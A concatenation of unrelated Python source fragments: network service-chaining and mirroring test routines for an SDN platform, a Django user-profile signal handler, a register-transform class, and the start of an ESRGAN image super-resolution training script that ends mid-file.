self.st_name, si_prefix, si_count, svc_scaling, max_inst, svc_mode=svc_mode, flavor=flavor, project=self.inputs.project_name, svc_img_name=svc_img_name, st_version=st_version, mgmt_vn=mgmt_vn, left_vn=left_vn, right_vn=right_vn)
self.action_list = self.chain_si(
si_count, si_prefix, self.inputs.project_name)
self.rules = [
{
'direction': '<>',
'protocol': proto,
'source_network': self.vn1_name,
'src_ports': src_ports,
'dest_network': self.vn2_name,
'dst_ports': dst_ports,
'simple_action': None,
'action_list': {'apply_service': self.action_list}
},
]
self.policy_fixture = self.config_policy(self.policy_name, self.rules)
self.vn1_policy_fix = self.attach_policy_to_vn(
self.policy_fixture, self.vn1_fixture)
self.vn2_policy_fix = self.attach_policy_to_vn(
self.policy_fixture, self.vn2_fixture)
if ci and self.inputs.get_af() == 'v4':
image_name = 'cirros-0.3.0-x86_64-uec'
else:
image_name = 'ubuntu-traffic'
self.vm1_fixture = self.config_and_verify_vm(
self.vm1_name, vn_fix=self.vn1_fixture, image_name=image_name)
self.vm2_fixture = self.config_and_verify_vm(
self.vm2_name, vn_fix=self.vn2_fixture, image_name=image_name)
result, msg = self.validate_vn(
self.vn1_name, project_name=self.inputs.project_name)
assert result, msg
result, msg = self.validate_vn(
self.vn2_name, project_name=self.inputs.project_name)
assert result, msg
if proto not in ['any', 'icmp']:
self.logger.info('Will skip Ping test')
else:
# Ping from left VM to right VM
errmsg = "Ping to Right VM %s from Left VM failed" % self.vm2_fixture.vm_ip
assert self.vm1_fixture.ping_with_certainty(
self.vm2_fixture.vm_ip, count='3'), errmsg
return True
def verify_svc_in_network_datapath(self, si_count=1, svc_scaling=False,
max_inst=1, svc_mode='in-network-nat',
flavor=None,
static_route=[None, None, None],
ordered_interfaces=True,
svc_img_name=None,
vn1_subnets=None,
vn2_fixture=None,
vn2_subnets=None,
ci=False, st_version=1):
"""Validate the service chaining in network datapath"""
self.mgmt_vn_name = get_random_name("mgmt_vn")
self.mgmt_vn_subnets = [get_random_cidr(af=self.inputs.get_af())]
self.mgmt_vn_fixture = self.config_vn(
self.mgmt_vn_name, self.mgmt_vn_subnets)
self.vn1_subnets = vn1_subnets or [
get_random_cidr(af=self.inputs.get_af())]
self.vn1_name = get_random_name("in_network_vn1")
self.vn2_name = get_random_name("in_network_vn2")
self.vm1_name = get_random_name("in_network_vm1")
self.vn2_subnets = vn2_subnets or [
get_random_cidr(af=self.inputs.get_af())]
self.vm2_name = get_random_name("in_network_vm2")
self.action_list = []
self.if_list = [['management', False, False],
['left', True, False], ['right', True, False]]
for entry in static_route:
if entry != 'None':
self.if_list[static_route.index(entry)][2] = True
self.st_name = get_random_name("in_net_svc_template_1")
si_prefix = get_random_name("in_net_svc_instance") + "_"
self.policy_name = get_random_name("policy_in_network")
self.vn1_fixture = self.config_vn(self.vn1_name, self.vn1_subnets)
if vn2_fixture is None:
self.vn2_fixture = self.config_vn(self.vn2_name, self.vn2_subnets)
else:
self.vn2_fixture = vn2_fixture
self.vn2_fq_name = vn2_fixture.vn_fq_name
self.vn2_name = self.vn2_fq_name.split(':')[2]
self.st_fixture, self.si_fixtures = self.config_st_si(
self.st_name, si_prefix, si_count, svc_scaling, max_inst, mgmt_vn=self.mgmt_vn_fixture.vn_fq_name, left_vn=self.vn1_fixture.vn_fq_name,
right_vn=self.vn2_fixture.vn_fq_name, svc_mode=svc_mode, flavor=flavor, static_route=static_route, ordered_interfaces=ordered_interfaces, svc_img_name=svc_img_name, project=self.inputs.project_name, st_version=st_version)
self.action_list = self.chain_si(
si_count, si_prefix, self.inputs.project_name)
self.rules = [
{
'direction': '<>',
'protocol': 'any',
'source_network': self.vn1_fixture.vn_fq_name,
'src_ports': [0, -1],
'dest_network': self.vn2_fixture.vn_fq_name,
'dst_ports': [0, -1],
'simple_action': None,
'action_list': {'apply_service': self.action_list}
},
]
self.policy_fixture = self.config_policy(self.policy_name, self.rules)
self.vn1_policy_fix = self.attach_policy_to_vn(
self.policy_fixture, self.vn1_fixture)
self.vn2_policy_fix = self.attach_policy_to_vn(
self.policy_fixture, self.vn2_fixture)
if ci and self.inputs.get_af() == 'v4' and self.inputs.orchestrator != 'vcenter':
image_name = 'cirros-0.3.0-x86_64-uec'
else:
image_name = 'ubuntu-traffic'
self.vm1_fixture = self.config_and_verify_vm(
self.vm1_name, vn_fix=self.vn1_fixture, image_name=image_name)
self.vm2_fixture = self.config_and_verify_vm(
self.vm2_name, vn_fix=self.vn2_fixture, image_name=image_name)
result, msg = self.validate_vn(
self.vn1_fixture.vn_name, project_name=self.vn1_fixture.project_name)
assert result, msg
result, msg = self.validate_vn(
self.vn2_fixture.vn_name, project_name=self.vn2_fixture.project_name, right_vn=True)
assert result, msg
# Ping from left VM to right VM
errmsg = "Ping to right VM ip %s from left VM failed" % self.vm2_fixture.vm_ip
assert self.vm1_fixture.ping_with_certainty(
self.vm2_fixture.vm_ip), errmsg
return True
def verify_multi_inline_svc(self, si_list=[('transparent', 1), ('in-network', 1), ('in-network-nat', 1)], flavor=None, ordered_interfaces=True, vn1_subnets=None, vn2_subnets=None, st_version=1, svc_img_name=None):
"""Validate in-line multi service chaining in network datapath"""
self.mgmt_vn_name = get_random_name("mgmt_vn")
self.mgmt_vn_subnets = [get_random_cidr(af=self.inputs.get_af())]
self.mgmt_vn_fixture = self.config_vn(
self.mgmt_vn_name, self.mgmt_vn_subnets)
vn1_subnets = vn1_subnets or [get_random_cidr(af=self.inputs.get_af())]
vn2_subnets = vn2_subnets or [get_random_cidr(af=self.inputs.get_af())]
self.vn1_name = get_random_name("in_network_vn1")
self.vn1_subnets = vn1_subnets
self.vm1_name = get_random_name("in_network_vm1")
self.vn2_name = get_random_name("in_network_vn2")
self.vn2_subnets = vn2_subnets
self.vm2_name = get_random_name("in_network_vm2")
self.action_list = []
self.si_list = []
self.policy_name = get_random_name("policy_in_network")
self.vn1_fixture = self.config_vn(self.vn1_name, self.vn1_subnets)
self.vn2_fixture = self.config_vn(self.vn2_name, self.vn2_subnets)
for si in si_list:
if st_version == 1:
(mgmt_vn, left_vn, right_vn) = (None, None, None)
else:
(mgmt_vn, left_vn, right_vn) = (self.mgmt_vn_fixture.vn_fq_name,
self.vn1_fixture.vn_fq_name, self.vn2_fixture.vn_fq_name)
self.if_list = [['management', False, False],
['left', True, False], ['right', True, False]]
svc_scaling = False
si_count = 1
self.st_name = get_random_name(
("multi_sc_") + si[0] + "_" + str(si_list.index(si)) + ("_st"))
si_prefix = get_random_name(
("multi_sc_") + si[0] + "_" + str(si_list.index(si)) + ("_si")) + "_"
max_inst = si[1]
if max_inst > 1:
svc_scaling = True
svc_mode = si[0]
(mgmt_vn, left_vn, right_vn) = (
None, self.vn1_fixture.vn_fq_name, self.vn2_fixture.vn_fq_name)
if svc_mode == 'transparent':
(mgmt_vn, left_vn, right_vn) = (None, None, None)
if st_version == 2:
(mgmt_vn, left_vn, right_vn) = (self.mgmt_vn_fixture.vn_fq_name,
self.vn1_fixture.vn_fq_name, self.vn2_fixture.vn_fq_name)
self.st_fixture, self.si_fixtures = self.config_st_si(
self.st_name, si_prefix, si_count, svc_scaling, max_inst, mgmt_vn=mgmt_vn, left_vn=left_vn,
right_vn=right_vn, svc_mode=svc_mode, flavor=flavor,
ordered_interfaces=ordered_interfaces, project=self.inputs.project_name, svc_img_name=svc_img_name, st_version=st_version)
action_step = self.chain_si(
si_count, si_prefix, self.inputs.project_name)
self.action_list += action_step
self.si_list += self.si_fixtures
self.rules = [
{
'direction': '<>',
'protocol': 'any',
'source_network': self.vn1_name,
'src_ports': [0, -1],
'dest_network': self.vn2_name,
'dst_ports': [0, -1],
'simple_action': None,
'action_list': {'apply_service': self.action_list}
},
]
self.policy_fixture = self.config_policy(self.policy_name, self.rules)
self.vn1_policy_fix = self.attach_policy_to_vn(
self.policy_fixture, self.vn1_fixture)
self.vn2_policy_fix = self.attach_policy_to_vn(
self.policy_fixture, self.vn2_fixture)
self.vm1_fixture = self.config_and_verify_vm(
self.vm1_name, vn_fix=self.vn1_fixture)
self.vm2_fixture = self.config_and_verify_vm(
self.vm2_name, vn_fix=self.vn2_fixture)
result, msg = self.validate_vn(
self.vn1_name, project_name=self.inputs.project_name)
assert result, msg
result, msg = self.validate_vn(
self.vn2_name, project_name=self.inputs.project_name, right_vn=True)
assert result, msg
# Ping from left VM to right VM
errmsg = "Ping to right VM ip %s from left VM failed" % self.vm2_fixture.vm_ip
assert self.vm1_fixture.ping_with_certainty(
self.vm2_fixture.vm_ip), errmsg
return True
# end verify_multi_inline_svc
def verify_policy_delete_add(self):
# Delete policy
self.detach_policy(self.vn1_policy_fix)
self.detach_policy(self.vn2_policy_fix)
self.unconfig_policy(self.policy_fixture)
# Ping from left VM to right VM; expected to fail
errmsg = "Ping to right VM ip %s from left VM passed; expected to fail" % self.vm2_fixture.vm_ip
assert self.vm1_fixture.ping_with_certainty(
self.vm2_fixture.vm_ip, expectation=False), errmsg
# Create policy again
self.policy_fixture = self.config_policy(self.policy_name, self.rules)
self.vn1_policy_fix = self.attach_policy_to_vn(
self.policy_fixture, self.vn1_fixture)
self.vn2_policy_fix = self.attach_policy_to_vn(
self.policy_fixture, self.vn2_fixture)
self.verify_si(self.si_fixtures)
# Wait for the existing flow entry to age
sleep(40)
# Ping from left VM to right VM
errmsg = "Ping to right VM ip %s from left VM failed" % self.vm2_fixture.vm_ip
assert self.vm1_fixture.ping_with_certainty(
self.vm2_fixture.vm_ip), errmsg
return True
def verify_protocol_port_change(self, mode='transparent'):
# Install traffic package in VM
self.vm1_fixture.install_pkg("Traffic")
self.vm2_fixture.install_pkg("Traffic")
sport = 8000
dport = 9000
sent, recv = self.verify_traffic(self.vm1_fixture, self.vm2_fixture,
'udp', sport=sport, dport=dport)
errmsg = "UDP traffic with src port %s and dst port %s failed" % (
sport, dport)
assert sent and recv == sent, errmsg
sport = 8000
dport = 9001
sent, recv = self.verify_traffic(self.vm1_fixture, self.vm2_fixture,
'tcp', sport=sport, dport=dport)
errmsg = "TCP traffic with src port %s and dst port %s failed" % (
sport, dport)
assert sent and recv == sent, errmsg
# Delete policy
self.detach_policy(self.vn1_policy_fix)
self.detach_policy(self.vn2_policy_fix)
self.unconfig_policy(self.policy_fixture)
# Update rule with specific port/protocol
action_list = {'apply_service': self.action_list}
new_rule = {'direction': '<>',
'protocol': 'tcp',
'source_network': self.vn1_name,
'src_ports': [8000, 8000],
'dest_network': self.vn2_name,
'dst_ports': [9001, 9001],
'simple_action': None,
'action_list': action_list
}
self.rules = [new_rule]
# Create new policy with rule to allow traffci from new VN's
self.policy_fixture = self.config_policy(self.policy_name, self.rules)
self.vn1_policy_fix = self.attach_policy_to_vn(
self.policy_fixture, self.vn1_fixture)
self.vn2_policy_fix = self.attach_policy_to_vn(
self.policy_fixture, self.vn2_fixture)
self.verify_si(self.si_fixtures)
self.logger.debug("Send udp traffic; with policy rule %s", new_rule)
sport = 8000
dport = 9000
sent, recv = self.verify_traffic(self.vm1_fixture, self.vm2_fixture,
'udp', sport=sport, dport=dport)
errmsg = "UDP traffic with src port %s and dst port %s passed; Expected to fail" % (
sport, dport)
assert sent and recv == 0, errmsg
sport = 8000
dport = 9001
self.logger.debug("Send tcp traffic; with policy rule %s", new_rule)
sent, recv = self.verify_traffic(self.vm1_fixture, self.vm2_fixture,
'tcp', sport=sport, dport=dport)
errmsg = "TCP traffic with src port %s and dst port %s failed" % (
sport, dport)
assert sent and recv == sent, errmsg
return True
def verify_add_new_vns(self):
# Delete policy
self.detach_policy(self.vn1_policy_fix)
self.detach_policy(self.vn2_policy_fix)
self.unconfig_policy(self.policy_fixture)
# Create one more left and right VN's
new_left_vn = "new_left_bridge_vn"
new_left_vn_net = [get_random_cidr(af=self.inputs.get_af())]
new_right_vn = "new_right_bridge_vn"
new_right_vn_net = [get_random_cidr(af=self.inputs.get_af())]
new_left_vn_fix = self.config_vn(new_left_vn, new_left_vn_net)
new_right_vn_fix = self.config_vn(new_right_vn, new_right_vn_net)
# Launch VMs in new left and right VN's
new_left_vm = 'new_left_bridge_vm'
new_right_vm = 'new_right_bridge_vm'
new_left_vm_fix = self.config_vm(new_left_vn_fix, new_left_vm)
new_right_vm_fix = self.config_vm(new_right_vn_fix, new_right_vm)
assert new_left_vm_fix.verify_on_setup()
assert new_right_vm_fix.verify_on_setup()
# Wait for VM's to come up
new_left_vm_fix.wait_till_vm_is_up()
new_right_vm_fix.wait_till_vm_is_up()
# Add rule to policy to allow traffic from new left_vn to right_vn
# through SI
new_rule = {'direction': '<>',
'protocol': 'any',
'source_network': new_left_vn,
'src_ports': [0, -1],
'dest_network': new_right_vn,
'dst_ports': [0, -1],
'simple_action': None,
'action_list': {'apply_service': self.action_list}
}
self.rules.append(new_rule)
# Create new policy with rule to allow traffci from new VN's
self.policy_fixture = self.config_policy(self.policy_name, self.rules)
self.vn1_policy_fix = self.attach_policy_to_vn(
self.policy_fixture, self.vn1_fixture)
self.vn2_policy_fix = self.attach_policy_to_vn(
self.policy_fixture, self.vn2_fixture)
# attach policy to new VN's
new_policy_left_vn_fix = self.attach_policy_to_vn(
self.policy_fixture, new_left_vn_fix)
new_policy_right_vn_fix = self.attach_policy_to_vn(
self.policy_fixture, new_right_vn_fix)
self.verify_si(self.si_fixtures)
# Ping from left VM to right VM
sleep(5)
self.logger.info("Verfiy ICMP traffic between new VN's.")
errmsg = "Ping to right VM ip %s from left VM failed" % new_right_vm_fix.vm_ip
assert new_left_vm_fix.ping_with_certainty(
new_right_vm_fix.vm_ip), errmsg
self.logger.info(
"Verfiy ICMP traffic between new left VN and existing right VN.")
errmsg = "Ping to right VM ip %s from left VM passed; \
Expected tp Fail" % self.vm2_fixture.vm_ip
assert new_left_vm_fix.ping_with_certainty(self.vm2_fixture.vm_ip,
expectation=False), errmsg
self.logger.info(
"Verfiy ICMP traffic between existing VN's with allow all.")
errmsg = "Ping to right VM ip %s from left VM failed" % self.vm2_fixture.vm_ip
assert self.vm1_fixture.ping_with_certainty(
self.vm2_fixture.vm_ip), errmsg
self.logger.info(
"Verfiy ICMP traffic between existing left VN and new right VN.")
errmsg = "Ping to right VM ip %s from left VM passed; \
Expected to Fail" % new_right_vm_fix.vm_ip
assert self.vm1_fixture.ping_with_certainty(new_right_vm_fix.vm_ip,
expectation=False), errmsg
# Ping between left VN's
self.logger.info(
"Verfiy ICMP traffic between new left VN and existing left VN.")
errmsg = "Ping to left VM ip %s from another left VM in different VN \
passed; Expected to fail" % self.vm1_fixture.vm_ip
assert new_left_vm_fix.ping_with_certainty(self.vm1_fixture.vm_ip,
expectation=False), errmsg
self.logger.info(
"Verfiy ICMP traffic between new right VN and existing right VN.")
errmsg = "Ping to right VM ip %s from another right VM in different VN \
passed; Expected to fail" % self.vm2_fixture.vm_ip
assert new_right_vm_fix.ping_with_certainty(self.vm2_fixture.vm_ip,
expectation=False), errmsg
# Delete policy
self.detach_policy(self.vn1_policy_fix)
self.detach_policy(self.vn2_policy_fix)
self.detach_policy(new_policy_left_vn_fix)
self.detach_policy(new_policy_right_vn_fix)
self.unconfig_policy(self.policy_fixture)
# Add rule to policy to allow only tcp traffic from new left_vn to right_vn
# through SI
self.rules.remove(new_rule)
udp_rule = {'direction': '<>',
'protocol': 'udp',
'source_network': new_left_vn,
'src_ports': [8000, 8000],
'dest_network': new_right_vn,
'dst_ports': [9000, 9000],
'simple_action': None,
'action_list': {'apply_service': self.action_list}
}
self.rules.append(udp_rule)
# Create new policy with rule to allow traffci from new VN's
self.policy_fixture = self.config_policy(self.policy_name, self.rules)
self.vn1_policy_fix = self.attach_policy_to_vn(
self.policy_fixture, self.vn1_fixture)
self.vn2_policy_fix = self.attach_policy_to_vn(
self.policy_fixture, self.vn2_fixture)
# attach policy to new VN's
new_policy_left_vn_fix = self.attach_policy_to_vn(
self.policy_fixture, new_left_vn_fix)
new_policy_right_vn_fix = self.attach_policy_to_vn(
self.policy_fixture, new_right_vn_fix)
self.verify_si(self.si_fixtures)
# Ping from left VM to right VM with udp rule
self.logger.info(
"Verify ICMP traffic with allow udp only rule from new left VN to new right VN")
errmsg = "Ping to right VM ip %s from left VM passed; Expected to fail" % new_right_vm_fix.vm_ip
assert new_left_vm_fix.ping_with_certainty(new_right_vm_fix.vm_ip,
expectation=False), errmsg
# Install traffic package in VM
self.vm1_fixture.install_pkg("Traffic")
self.vm2_fixture.install_pkg("Traffic")
new_left_vm_fix.install_pkg("Traffic")
new_right_vm_fix.install_pkg("Traffic")
self.logger.info(
"Verify UDP traffic with allow udp only rule from new left VN to new right VN")
sport = 8000
dport = 9000
sent, recv = self.verify_traffic(new_left_vm_fix, new_right_vm_fix,
'udp', sport=sport, dport=dport)
errmsg = "UDP traffic with src port %s and dst port %s failed" % (
sport, dport)
assert sent and recv == sent, errmsg
self.logger.info("Verfiy ICMP traffic with allow all.")
errmsg = "Ping to right VM ip %s from left VM failed" % self.vm2_fixture.vm_ip
assert self.vm1_fixture.ping_with_certainty(
self.vm2_fixture.vm_ip), errmsg
self.logger.info("Verify UDP traffic with allow all")
sport = 8001
dport = 9001
sent, recv = self.verify_traffic(self.vm1_fixture, self.vm2_fixture,
'udp', sport=sport, dport=dport)
errmsg = "UDP traffic with src port %s and dst port %s failed" % (
sport, dport)
assert sent and recv == sent, errmsg
# Delete policy
self.delete_vm(new_left_vm_fix)
self.delete_vm(new_right_vm_fix)
self.detach_policy(new_policy_left_vn_fix)
self.detach_policy(new_policy_right_vn_fix)
self.delete_vn(new_left_vn_fix)
self.delete_vn(new_right_vn_fix)
self.verify_si(self.si_fixtures)
self.logger.info(
"Icmp traffic with allow all after deleting the new left and right VN.")
errmsg = "Ping to right VM ip %s from left VM failed" % self.vm2_fixture.vm_ip
assert self.vm1_fixture.ping_with_certainty(
self.vm2_fixture.vm_ip), errmsg
return True
def verify_add_new_vms(self):
# Launch VMs in new left and right VN's
new_left_vm = 'new_left_bridge_vm'
new_right_vm = 'new_right_bridge_vm'
new_left_vm_fix = self.config_vm(self.vn1_fixture, new_left_vm)
new_right_vm_fix = self.config_vm(self.vn2_fixture, new_right_vm)
assert new_left_vm_fix.verify_on_setup()
assert new_right_vm_fix.verify_on_setup()
# Wait for VM's to come up
new_left_vm_fix.wait_till_vm_is_up()
new_right_vm_fix.wait_till_vm_is_up()
# Ping from left VM to right VM
errmsg = "Ping to right VM ip %s from left VM failed" % new_right_vm_fix.vm_ip
assert new_left_vm_fix.ping_with_certainty(
new_right_vm_fix.vm_ip), errmsg
errmsg = "Ping to right VM ip %s from left VM failed" % self.vm2_fixture.vm_ip
assert new_left_vm_fix.ping_with_certainty(
self.vm2_fixture.vm_ip), errmsg
errmsg = "Ping to right VM ip %s from left VM failed" % self.vm2_fixture.vm_ip
assert self.vm1_fixture.ping_with_certainty(
self.vm2_fixture.vm_ip), errmsg
errmsg = "Ping to right VM ip %s from left VM failed" % new_right_vm_fix.vm_ip
assert self.vm1_fixture.ping_with_certainty(
new_right_vm_fix.vm_ip), errmsg
# Install traffic package in VM
self.vm1_fixture.install_pkg("Traffic")
self.vm2_fixture.install_pkg("Traffic")
self.logger.debug("Send udp traffic; with policy rule allow all")
sport = 8000
dport = 9000
sent, recv = self.verify_traffic(self.vm1_fixture, self.vm2_fixture,
'udp', sport=sport, dport=dport)
errmsg = "UDP traffic with src port %s and dst port %s failed" % (
sport, dport)
assert sent and recv == sent, errmsg
# Delete policy
self.detach_policy(self.vn1_policy_fix)
self.detach_policy(self.vn2_policy_fix)
self.unconfig_policy(self.policy_fixture)
# Add rule to policy to allow traffic from new left_vn to right_vn
# through SI
new_rule = {'direction': '<>',
'protocol': 'udp',
'source_network': self.vn1_name,
'src_ports': [8000, 8000],
'dest_network': self.vn2_name,
'dst_ports': [9000, 9000],
'simple_action': None,
'action_list': {'apply_service': self.action_list}
}
self.rules = [new_rule]
# Create new policy with rule to allow traffci from new VN's
self.policy_fixture = self.config_policy(self.policy_name, self.rules)
self.vn1_policy_fix = self.attach_policy_to_vn(
self.policy_fixture, self.vn1_fixture)
self.vn2_policy_fix = self.attach_policy_to_vn(
self.policy_fixture, self.vn2_fixture)
self.verify_si(self.si_fixtures)
# Install traffic package in VM
new_left_vm_fix.install_pkg("Traffic")
new_right_vm_fix.install_pkg("Traffic")
self.logger.debug("Send udp traffic; with policy rule %s", new_rule)
sport = 8000
dport = 9000
sent, recv = self.verify_traffic(self.vm1_fixture, self.vm2_fixture,
'udp', sport=sport, dport=dport)
errmsg = "UDP traffic with src port %s and dst port %s failed" % (
sport, dport)
assert sent and recv == sent, errmsg
sent, recv = self.verify_traffic(self.vm1_fixture, new_right_vm_fix,
'udp', sport=sport, dport=dport)
errmsg = "UDP traffic with src port %s and dst port %s failed" % (
sport, dport)
assert sent and recv == sent, errmsg
sent, recv = self.verify_traffic(new_left_vm_fix, new_right_vm_fix,
'udp', sport=sport, dport=dport)
errmsg = "UDP traffic with src port %s and dst port %s failed" % (
sport, dport)
assert sent and recv == sent, errmsg
sent, recv = self.verify_traffic(new_left_vm_fix, self.vm2_fixture,
'udp', sport=sport, dport=dport)
errmsg = "UDP traffic with src port %s and dst port %s failed" % (
sport, dport)
assert sent and recv == sent, errmsg
# Ping from left VM to right VM
errmsg = "Ping to right VM ip %s from left VM failed; Expected to fail" % new_right_vm_fix.vm_ip
assert new_left_vm_fix.ping_with_certainty(
new_right_vm_fix.vm_ip, expectation=False), errmsg
errmsg = "Ping to right VM ip %s from left VM failed; Expected to fail" % self.vm2_fixture.vm_ip
assert new_left_vm_fix.ping_with_certainty(
self.vm2_fixture.vm_ip, expectation=False), errmsg
errmsg = "Ping to right VM ip %s from left VM failed; Expected to fail" % self.vm2_fixture.vm_ip
assert self.vm1_fixture.ping_with_certainty(
self.vm2_fixture.vm_ip, expectation=False), errmsg
errmsg = "Ping to right VM ip %s from left VM passed; Expected to fail" % new_right_vm_fix.vm_ip
assert self.vm1_fixture.ping_with_certainty(
new_right_vm_fix.vm_ip, expectation=False), errmsg
return True
def verify_firewall_with_mirroring(
self, si_count=1, svc_scaling=False, max_inst=1,
firewall_svc_mode='in-network', mirror_svc_mode='transparent', flavor='contrail_flavor_2cpu', vn1_subnets=None, vn2_subnets=None):
"""Validate the service chaining in network datapath"""
self.vn1_fq_name = "default-domain:" + self.inputs.project_name + \
":" + get_random_name("in_network_vn1")
self.vn1_name = self.vn1_fq_name.split(':')[2]
self.vn1_subnets = [
vn1_subnets or get_random_cidr(af=self.inputs.get_af())]
self.vm1_name = get_random_name("in_network_vm1")
self.vn2_fq_name = "default-domain:" + self.inputs.project_name + \
":" + get_random_name("in_network_vn2")
self.vn2_name = self.vn2_fq_name.split(':')[2]
self.vn2_subnets = [
vn2_subnets or get_random_cidr(af=self.inputs.get_af())]
self.vm2_name = get_random_name("in_network_vm2")
self.action_list = []
self.firewall_st_name = get_random_name("svc_firewall_template_1")
firewall_si_prefix = get_random_name("svc_firewall_instance") + "_"
self.mirror_st_name = get_random_name("svc_mirror_template_1")
mirror_si_prefix = get_random_name("svc_mirror_instance") + "_"
self.policy_name = get_random_name("policy_in_network")
self.vn1_fixture = self.config_vn(self.vn1_name, self.vn1_subnets)
self.vn2_fixture = self.config_vn(self.vn2_name, self.vn2_subnets)
if firewall_svc_mode == 'transparent':
self.if_list = []
self.st_fixture, self.firewall_si_fixtures = self.config_st_si(
self.firewall_st_name,
firewall_si_prefix, si_count,
svc_scaling, max_inst,
left_vn=None, right_vn=None,
svc_img_name='tiny_trans_fw',
svc_mode=firewall_svc_mode, flavor=flavor, project=self.inputs.project_name)
if firewall_svc_mode == 'in-network'or firewall_svc_mode == 'in-network-nat':
self.st_fixture, self.firewall_si_fixtures = self.config_st_si(
self.firewall_st_name,
firewall_si_prefix, si_count,
svc_scaling, max_inst,
left_vn=self.vn1_fq_name,
right_vn=self.vn2_fq_name,
svc_img_name='ubuntu-in-net',
svc_mode=firewall_svc_mode, flavor=flavor, project=self.inputs.project_name)
self.action_list = self.chain_si(
si_count, firewall_si_prefix, self.inputs.project_name)
self.st_fixture, self.mirror_si_fixtures = self.config_st_si(
self.mirror_st_name,
mirror_si_prefix, si_count,
left_vn=self.vn1_fq_name,
svc_type='analyzer',
svc_mode=mirror_svc_mode, flavor=flavor, project=self.inputs.project_name)
self.action_list += (self.chain_si(si_count,
mirror_si_prefix, self.inputs.project_name))
self.rules = [
{
'direction': '<>',
'protocol': 'any',
'source_network': self.vn1_name,
'src_ports': [0, -1],
'dest_network': self.vn2_name,
'dst_ports': [0, -1],
'simple_action': 'pass',
'action_list': {'simple_action': 'pass',
'mirror_to': {'analyzer_name': self.action_list[1]},
'apply_service': self.action_list[:1]}
},
]
self.policy_fixture = self.config_policy(self.policy_name, self.rules)
self.vn1_policy_fix = self.attach_policy_to_vn(
self.policy_fixture, self.vn1_fixture)
self.vn2_policy_fix = self.attach_policy_to_vn(
self.policy_fixture, self.vn2_fixture)
self.vm1_fixture = self.config_vm(self.vn1_fixture, self.vm1_name)
self.vm2_fixture = self.config_vm(self.vn2_fixture, self.vm2_name)
self.vm1_fixture.wait_till_vm_is_up()
self.vm2_fixture.wait_till_vm_is_up()
result, msg = self.validate_vn(
self.vn1_name, project_name=self.inputs.project_name)
assert result, msg
result, msg = self.validate_vn(
self.vn2_name, project_name=self.inputs.project_name)
assert result, msg
self.verify_si(self.firewall_si_fixtures)
self.verify_si(self.mirror_si_fixtures)
for si_fix in self.firewall_si_fixtures:
svms = self.get_svms_in_si(si_fix, self.inputs.project_name)
for svm in svms:
svm_name = svm.name
host = self.get_svm_compute(svm_name)
svm_node_ip = host
# Ping from left VM to right VM
errmsg = "Ping to right VM ip %s from left VM failed" % self.vm2_fixture.vm_ip
assert self.vm1_fixture.ping_with_certainty(
self.vm2_fixture.vm_ip), errmsg
# Verify ICMP mirror
sessions = self.tcpdump_on_all_analyzer(
self.mirror_si_fixtures, mirror_si_prefix, si_count)
errmsg = "Ping to right VM ip %s from left VM failed" % self.vm2_fixture.vm_ip
assert self.vm1_fixture.ping_with_certainty(
self.vm2_fixture.vm_ip), errmsg
for svm_name, (session, pcap) in sessions.items():
if self.vm1_fixture.vm_node_ip == self.vm2_fixture.vm_node_ip:
if firewall_svc_mode == 'transparent':
count = 20
else:
count = 10
if self.vm1_fixture.vm_node_ip != self.vm2_fixture.vm_node_ip:
if firewall_svc_mode == 'in-network' and self.vm1_fixture.vm_node_ip == svm_node_ip:
count = 10
else:
count = 20
self.verify_icmp_mirror(svm_name, session, pcap, count)
return True
| StarcoderdataPython |
3292857 | from django.db.models.signals import post_save, post_delete
from django.dispatch import receiver
from django.conf import settings
from .models import Profile
__all__ = (
'create_user_profile',
'save_user_profile',
)
@receiver(post_save, sender=settings.AUTH_USER_MODEL)
def create_user_profile(sender, instance, created, **kwargs):
if created:
Profile.objects.create(uid=instance)
@receiver(post_save, sender=settings.AUTH_USER_MODEL)
def save_user_profile(sender, instance, **kwargs):
instance.profile.save()
| StarcoderdataPython |
32830 | <reponame>fengjixuchui/scapula<filename>scapula/transform/encoded_rt_to_r9.py
import shoulder
class EncodedRtToR9(shoulder.transform.abstract_transform.AbstractTransform):
@property
def description(self):
d = "changing src/dest register for encoded accessors from r0 to r9"
return d
def do_transform(self, reg):
for am in reg.access_mechanisms["mrs_register"]:
am.rt = 9
for am in reg.access_mechanisms["msr_register"]:
am.rt = 9
return reg
| StarcoderdataPython |
1733634 | from pathlib import Path
from tqdm import tqdm
import tensorflow as tf
from modules.esrgan import rrdb_net
from modules.lr_scheduler import MultiStepLR
from modules.data import load_dataset
from modules.losses import get_pixel_loss
HAS_WANDB_ACCOUNT = True
PROJECT = 'esrgan-tf2'
import wandb
if not HAS_WANDB_ACCOUNT:
wandb.login(anonymous='allow')
else:
wandb.login()
INITIAL_LR = 2e-4
LR_RATE = 0.5
LR_STEPS = [200000, 400000, 600000, 800000]
ADAM_BETA1_G = 0.9
ADAM_BETA2_G = 0.99
W_PIXEL = 1.0
PIXEL_CRITERION = 'l1'
HR_HEIGHT = 128
HR_WIDTH = 128
SCALE = 4
BATCH_SIZE = 16
BUFFER_SIZE = 10240
INPUT_SHAPE=(None, None, 3)
NUM_ITER = 1000000
SAVE_STEPS = 5000
CHECK_POINT_PATH = "./saved/checkpoints/psnr"
Path(CHECK_POINT_PATH).mkdir(parents=True, exist_ok=True)
SAVE_MODEL_PATH = "./saved/models/psnr.h5"
Path(SAVE_MODEL_PATH).parent.mkdir(parents=True, exist_ok=True)
def main():
dataset = load_dataset(HR_HEIGHT, HR_WIDTH, SCALE)
dataset = dataset.repeat()
dataset = dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE).prefetch(tf.data.experimental.AUTOTUNE)
model = rrdb_net(input_shape=INPUT_SHAPE,scale_factor=SCALE)
learning_rate = MultiStepLR(INITIAL_LR, LR_STEPS, LR_RATE)
optimizer = tf.keras.optimizers.Adam(learning_rate= learning_rate,
beta_1= ADAM_BETA1_G,
beta_2= ADAM_BETA2_G
)
pixel_loss = get_pixel_loss(PIXEL_CRITERION)
checkpoint = tf.train.Checkpoint(step=tf.Variable(0, name='step'),
optimizer=optimizer,
model=model)
manager = tf.train.CheckpointManager(checkpoint=checkpoint,
directory=CHECK_POINT_PATH,
max_to_keep=3)
if manager.latest_checkpoint:
checkpoint.restore(manager.latest_checkpoint)
print('[*] load ckpt from {} at step {}.'.format(
manager.latest_checkpoint, checkpoint.step.numpy()))
else:
print("[*] training from scratch.")
@tf.function
def train_step(lr, hr):
with tf.GradientTape() as tape:
generated_hr = model(lr, training=True)
loss = W_PIXEL * pixel_loss(hr, generated_hr)
grads = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(grads, model.trainable_variables))
return loss
wandb_run_id = "psnr-training" #@param {type:"string"}
